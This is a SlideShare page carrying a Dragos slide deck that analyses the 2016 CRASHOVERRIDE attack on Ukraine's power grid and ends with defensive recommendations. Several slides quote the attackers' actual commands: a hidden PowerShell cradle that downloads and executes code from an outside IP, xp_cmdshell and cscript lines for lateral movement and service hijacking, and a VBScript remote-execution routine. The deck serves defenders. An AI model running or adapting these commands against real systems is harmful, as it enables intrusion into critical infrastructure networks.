DCUS17 : Docker networking deep diveDCUS17 : Docker networking deep dive
DCUS17 : Docker networking deep dive
 

More from Dragos, Inc.

How to Increase ICS Cybersecurity Return on Investment (ROI)
How to Increase ICS Cybersecurity Return on Investment (ROI) How to Increase ICS Cybersecurity Return on Investment (ROI)
How to Increase ICS Cybersecurity Return on Investment (ROI) Dragos, Inc.
 
Dragos 2019 ICS Year in Review
Dragos 2019 ICS Year in ReviewDragos 2019 ICS Year in Review
Dragos 2019 ICS Year in ReviewDragos, Inc.
 
Dragos and CyberWire: ICS Ransomware
Dragos and CyberWire: ICS Ransomware Dragos and CyberWire: ICS Ransomware
Dragos and CyberWire: ICS Ransomware Dragos, Inc.
 
Dragos S4x20: How to Build an OT Security Operations Center
Dragos S4x20: How to Build an OT Security Operations CenterDragos S4x20: How to Build an OT Security Operations Center
Dragos S4x20: How to Build an OT Security Operations CenterDragos, Inc.
 
Dragos S4X20: Mapping ICS Incidents to the MITRE Attack Framework
Dragos S4X20: Mapping ICS Incidents to the MITRE Attack FrameworkDragos S4X20: Mapping ICS Incidents to the MITRE Attack Framework
Dragos S4X20: Mapping ICS Incidents to the MITRE Attack FrameworkDragos, Inc.
 
Reassessing the 2016 CRASHOVERRIDE Cyber Attack
Reassessing the 2016 CRASHOVERRIDE Cyber AttackReassessing the 2016 CRASHOVERRIDE Cyber Attack
Reassessing the 2016 CRASHOVERRIDE Cyber AttackDragos, Inc.
 
Solving ICS Cybersecurity Challenges in the Electric Industry
Solving ICS Cybersecurity Challenges in the Electric IndustrySolving ICS Cybersecurity Challenges in the Electric Industry
Solving ICS Cybersecurity Challenges in the Electric IndustryDragos, Inc.
 
Purple Teaming ICS Networks
Purple Teaming ICS NetworksPurple Teaming ICS Networks
Purple Teaming ICS NetworksDragos, Inc.
 
Securing Electric Utility Infrastructure
Securing Electric Utility InfrastructureSecuring Electric Utility Infrastructure
Securing Electric Utility InfrastructureDragos, Inc.
 
Rising Cyber Escalation US Iran Russia ICS Threats and Response
Rising Cyber Escalation US Iran Russia ICS Threats and Response Rising Cyber Escalation US Iran Russia ICS Threats and Response
Rising Cyber Escalation US Iran Russia ICS Threats and Response Dragos, Inc.
 
Neighborhood Keeper - Introduction
Neighborhood Keeper - Introduction Neighborhood Keeper - Introduction
Neighborhood Keeper - Introduction Dragos, Inc.
 
Dressing up the ICS Kill Chain
Dressing up the ICS Kill ChainDressing up the ICS Kill Chain
Dressing up the ICS Kill ChainDragos, Inc.
 
Consequence Informed Cyber Security
Consequence Informed Cyber Security Consequence Informed Cyber Security
Consequence Informed Cyber Security Dragos, Inc.
 
Dragos year in review (yir) 2018
Dragos year in review (yir) 2018Dragos year in review (yir) 2018
Dragos year in review (yir) 2018Dragos, Inc.
 
Dragos & SRP, PI World 2019: Utilizing Operations Data for Enhanced Cyber Thr...
Dragos & SRP, PI World 2019: Utilizing Operations Data for Enhanced Cyber Thr...Dragos & SRP, PI World 2019: Utilizing Operations Data for Enhanced Cyber Thr...
Dragos & SRP, PI World 2019: Utilizing Operations Data for Enhanced Cyber Thr...Dragos, Inc.
 
2018 Year in Review- ICS Threat Activity Groups
2018 Year in Review- ICS Threat Activity Groups2018 Year in Review- ICS Threat Activity Groups
2018 Year in Review- ICS Threat Activity GroupsDragos, Inc.
 
Insights To Building An Effective Industrial Cybersecurity Strategy For Your ...
Insights To Building An Effective Industrial Cybersecurity Strategy For Your ...Insights To Building An Effective Industrial Cybersecurity Strategy For Your ...
Insights To Building An Effective Industrial Cybersecurity Strategy For Your ...Dragos, Inc.
 
The Current ICS Threat Landscape
The Current ICS Threat LandscapeThe Current ICS Threat Landscape
The Current ICS Threat LandscapeDragos, Inc.
 
Industrial Control Systems Cybersecurity Technology Selection
Industrial Control Systems Cybersecurity Technology SelectionIndustrial Control Systems Cybersecurity Technology Selection
Industrial Control Systems Cybersecurity Technology SelectionDragos, Inc.
 
Intelligence-Driven Industrial Security with Case Studies in ICS Attacks
Intelligence-Driven Industrial Security with Case Studies in ICS Attacks Intelligence-Driven Industrial Security with Case Studies in ICS Attacks
Intelligence-Driven Industrial Security with Case Studies in ICS Attacks Dragos, Inc.
 

More from Dragos, Inc. (20)

How to Increase ICS Cybersecurity Return on Investment (ROI)
How to Increase ICS Cybersecurity Return on Investment (ROI) How to Increase ICS Cybersecurity Return on Investment (ROI)
How to Increase ICS Cybersecurity Return on Investment (ROI)
 
Dragos 2019 ICS Year in Review
Dragos 2019 ICS Year in ReviewDragos 2019 ICS Year in Review
Dragos 2019 ICS Year in Review
 
Dragos and CyberWire: ICS Ransomware
Dragos and CyberWire: ICS Ransomware Dragos and CyberWire: ICS Ransomware
Dragos and CyberWire: ICS Ransomware
 
Dragos S4x20: How to Build an OT Security Operations Center
Dragos S4x20: How to Build an OT Security Operations CenterDragos S4x20: How to Build an OT Security Operations Center
Dragos S4x20: How to Build an OT Security Operations Center
 
Dragos S4X20: Mapping ICS Incidents to the MITRE Attack Framework
Dragos S4X20: Mapping ICS Incidents to the MITRE Attack FrameworkDragos S4X20: Mapping ICS Incidents to the MITRE Attack Framework
Dragos S4X20: Mapping ICS Incidents to the MITRE Attack Framework
 
Reassessing the 2016 CRASHOVERRIDE Cyber Attack
Reassessing the 2016 CRASHOVERRIDE Cyber AttackReassessing the 2016 CRASHOVERRIDE Cyber Attack
Reassessing the 2016 CRASHOVERRIDE Cyber Attack
 
Solving ICS Cybersecurity Challenges in the Electric Industry
Solving ICS Cybersecurity Challenges in the Electric IndustrySolving ICS Cybersecurity Challenges in the Electric Industry
Solving ICS Cybersecurity Challenges in the Electric Industry
 
Purple Teaming ICS Networks
Purple Teaming ICS NetworksPurple Teaming ICS Networks
Purple Teaming ICS Networks
 
Securing Electric Utility Infrastructure
Securing Electric Utility InfrastructureSecuring Electric Utility Infrastructure
Securing Electric Utility Infrastructure
 
Rising Cyber Escalation US Iran Russia ICS Threats and Response
Rising Cyber Escalation US Iran Russia ICS Threats and Response Rising Cyber Escalation US Iran Russia ICS Threats and Response
Rising Cyber Escalation US Iran Russia ICS Threats and Response
 
Neighborhood Keeper - Introduction
Neighborhood Keeper - Introduction Neighborhood Keeper - Introduction
Neighborhood Keeper - Introduction
 
Dressing up the ICS Kill Chain
Dressing up the ICS Kill ChainDressing up the ICS Kill Chain
Dressing up the ICS Kill Chain
 
Consequence Informed Cyber Security
Consequence Informed Cyber Security Consequence Informed Cyber Security
Consequence Informed Cyber Security
 
Dragos year in review (yir) 2018
Dragos year in review (yir) 2018Dragos year in review (yir) 2018
Dragos year in review (yir) 2018
 
Dragos & SRP, PI World 2019: Utilizing Operations Data for Enhanced Cyber Thr...
Dragos & SRP, PI World 2019: Utilizing Operations Data for Enhanced Cyber Thr...Dragos & SRP, PI World 2019: Utilizing Operations Data for Enhanced Cyber Thr...
Dragos & SRP, PI World 2019: Utilizing Operations Data for Enhanced Cyber Thr...
 
2018 Year in Review- ICS Threat Activity Groups
2018 Year in Review- ICS Threat Activity Groups2018 Year in Review- ICS Threat Activity Groups
2018 Year in Review- ICS Threat Activity Groups
 
Insights To Building An Effective Industrial Cybersecurity Strategy For Your ...
Insights To Building An Effective Industrial Cybersecurity Strategy For Your ...Insights To Building An Effective Industrial Cybersecurity Strategy For Your ...
Insights To Building An Effective Industrial Cybersecurity Strategy For Your ...
 
The Current ICS Threat Landscape
The Current ICS Threat LandscapeThe Current ICS Threat Landscape
The Current ICS Threat Landscape
 
Industrial Control Systems Cybersecurity Technology Selection
Industrial Control Systems Cybersecurity Technology SelectionIndustrial Control Systems Cybersecurity Technology Selection
Industrial Control Systems Cybersecurity Technology Selection
 
Intelligence-Driven Industrial Security with Case Studies in ICS Attacks
Intelligence-Driven Industrial Security with Case Studies in ICS Attacks Intelligence-Driven Industrial Security with Case Studies in ICS Attacks
Intelligence-Driven Industrial Security with Case Studies in ICS Attacks
 

Recently uploaded

Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 

Recently uploaded (20)

Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 

Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE

  • 1.
  • 2.
  • 3.
  • 4.
  • 5.
  • 6. • Event Background • Initial Intrusion • ICS Effects • Conclusions
  • 7. • First (only?) publicly-known malware targeting grid operations • Designed to: • Disrupt grid operations • Impede grid recovery
  • 8. • 17 Dec 2016, 23:53 Local Time: • Ukrenergo substation de- energizes • Resulted in outage for service area • Utility transferred into manual mode • Began restoring power in 30 minutes
  • 9.
  • 10. • Event was seemingly well-documented… • Critical questions unanswered: • Penetration of ICS network • In-depth evaluation of ICS capability • Context to build up layered defense
  • 11.
  • 12. • No ICS-specific malware deployed • Attack was manual in nature: • Adversary established remote access to engineering workstation • Manipulated controls to produce effect
  • 13. • Significant alteration in tradecraft • Attack leveraged ICS-specific malware • Codifies specialist knowledge in software • Enables operations to scale
  • 14.
  • 15. • Precise methodology unknown • Large-scale phishing events in Ukraine in January 2016 • First definite indications of activity within network: October 2016
  • 16. • Adversary begins manipulating ICS network devices 01 December 2016 • Creates attacker-controlled accounts: • Admin • Система (‘System’) • Attempts remote access to multiple systems with credentials
  • 17. • Environment contained 3 MS-SQL servers • Connected to production equipment • Likely serving as data historians within the victim environment • First accessed on 12 December 2016
  • 18. • Subsequent activity focuses on using SQL Servers to interact with environment • Extensive use of MS-SQL commands for command execution: EXEC xp_cmdshell <command>
  • 19. EXEC xp_cmdshell 'net use L: <TargetIP>$C <Password> /USER:<Domain><User>’; EXEC xp_cmdshell 'move C:Deltam32.txt C:Deltam32.exe’; EXEC xp_cmdshell 'netstat -an';
  • 20. • Use of Mimikatz for credential capture • Two variants: • Compiled version of Github repo • Same, but UPX packed • Credential capture and re-use critical to intrusion
  • 21. • Once within network and possessing credentials: • File movement utilized NET utilities • Captured credentials allowed for remote access and file copying
  • 22. • XP_CMDSHELL used for code execution on SQL Servers • Code execution on other devices leveraged various remote means: • Scripts • PSExec
  • 23. • Use of custom BAT scripts: • Process execution • System survey and recon • Attack pre-positioning • General avoidance of malware
  • 24. powershell.exe -nop -w hidden -c $l=new- object net.webclient;$l.proxy=[Net.WebRequest]::Ge tSystemWebProxy();$l.Proxy.Credentials=[Net .CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://188.42.253.43:880 1/msupdate');
  • 25. Function RunRemoteProcess(Command) Set objStartup = objSWbemServices.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = 0 Set objProcess = objSWbemServices.Get("Win32_Process") strCmd = "cmd.exe /c " & Command & " >> " & GetReportFile() intReturn = objProcess.Create(strCmd, Null, objConfig, intProcessID) If intReturn <> 0 Then Wscript.Echo "Process could not be created." & _ vbNewLine & "Command line: " & strCmd & _ vbNewLine & "Return value: " & intReturn RunRemoteProcess = 2 Exit Function
  • 26. cscript C:Backinfoufn.vbs <TargetIP 1> "C:BackinfoImapiService.exe" "C:Deltasvchost.exe" cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfo104.dll" "C:Delta104.dll" cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfo140.ini" "C:Delta104.ini" cscript C:Backinfoufn.vbs <TargetIP 1> "C:Backinfohaslo.dat" "C:Deltahaslo.dat" cscript C:Backinfosqlc.vbs <TargetIP 1> "-c" "dir C:Delta" cscript C:Backinfoufn.vbs <TargetIP 2> "C:BackinfoImapiService.exe" "C:Deltasvchost.exe" cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfo104.dll" "C:Delta104.dll" cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfo128.ini" "C:Delta104.ini" cscript C:Backinfoufn.vbs <TargetIP 2> "C:Backinfohaslo.dat" "C:Deltahaslo.dat" cscript C:Backinfosqlc.vbs <TargetIP 2> "-c" "dir C:Delta" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfodefragsvc.exe" "C:D2svchost.exe" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfo104.dll" "C:D2104.dll" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfo5.ini" "C:D2104.ini" cscript C:Backinfoufn.vbs <TargetIP 3> "C:Backinfohaslo.dat" "C:D2haslo.dat" cscript C:Backinfosqlc.vbs <TargetIP 3> "-c" "dir C:D2"
  • 27. • Little to no use of obfuscation • Scripts are clearly written, functionality easily understood • With visibility, easy to detect
  • 28. • Extensive use of Windows Sysinternals PSExec utility • However: • Used an older version – 2.11 • Released April 2014 • Latest version at time of attack was 2.2
  • 29. • Designed and deployed a custom backdoor • Unnecessary given observed events • Provides basic RAT functionality • No built-in information gathering/exfil capability
  • 30.
  • 31. • Backdoor compiled and deployed long after network intrusion • Capabilities provided already included in TTPs covered previously • Purpose for deployment unknown
  • 32.
  • 33. • Deployment based on prior steps • Deploy via XP_CMDSHELL from SQL servers • Use credentials to remotely copy files • Scripted remote process execution to launch payloads
  • 34. cscript C:Backinfosqlc.vbs <TargetIP 1> "-c" "sc config ImapiService binPath= 'C:Deltasvchost.exe C:Delta 104.dll 104.ini' start= auto && sc start ImapiService" cscript C:Backinfosqlc.vbs <TargetIP 2> "-c" "sc config ImapiService binPath= 'C:Deltasvchost.exe C:Delta 104.dll 104.ini' start= auto && sc start ImapiService" cscript C:Backinfosqlc.vbs <TargetIP 3> "-c" "sc config defragsvc binPath= 'C:D2svchost.exe C:D2 104.dll 104.ini' start= auto && sc start defragsvc"
  • 35. • CRASHOVERRIDE execution starts with a dedicated launcher EXE • One stand-alone exception • Serves to: • Initiate payload, manage execution • Clean up and terminate
  • 36.
  • 37. • Four modules targeting different ICS communication protocols: • IEC-101 • IEC-104 • IEC-61850 • OPC
  • 38. • Different modules, but similar purpose • Goal: • Manipulate breakers and switch gear • Interrupt power distribution • Basically: turn things on/off (open/closed)
  • 39. • Configuration files for some payloads indicate 80+ targets • Log file results indicate over 100 potential targets • Manual operations would not work for this level of impact
  • 40. [*ServerName: ABB.IEC61850_OPC_DA_Server.Instance[3].1*] [State: After ON] OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI10PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI11PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI12PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI1PosstVal Quality: 192 value: 2 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI2PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI3PosstVal Quality: 192 value: 2 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI4PosstVal Quality: 192 value: 1 OPCItem name : WA1AA1E1Q04A117REC_OKT2SCSWI7PosstVal Quality: 192 value: 2
  • 41.
  • 42.
  • 43. • Following grid impact, CRASHOVERRIDE moves to a new destructive stage • After a hard-coded wait time: • Destructive component launched • Specified in launcher component
  • 44. Registry •Zeroes registry key ImagePath for critical services •Makes system unbootable Files •Erases ICS configuration files •Erases other file extensions Kills Processes • Kill the machine
  • 45. • Finally – a denial of service stand-alone identified • Targets a Siemens SIPROTEC vulnerability from 2015: • CVE-2015-5374 • DoS via specially-crafted packet to UDP 50000
  • 46. • EXE created with hard-coded target IP addresses • Only useful in the target environment • BUT: • Improper byte conversion applied for IP addresses • Results in IPs shifted in reverse when setting up sockets
  • 47. • CRASHOVERRIDE attack part of a long- running intrusion • Attack avoided “malware” until final stages • Primary use of native system utilities and credential capture
  • 48. • CRASHOVERRIDE provides an attack framework • BUT – exact attack will not be replicated • Instead: • Attack methodology will be re-used • Underlying behaviors will maintain similarity
  • 49. Prevention • Protect Logon Info • Isolate and Segregate Networks Detection • Improve Host Visibility in ICS • Use Network Visibility to Detect Lateral Movement Mitigation • Implement Bastion Hosts • Structure Defense to Respond Earlier in Kill Chain Recovery • Develop and Rehearse Response Plans • Secure Storage of Backup Project Files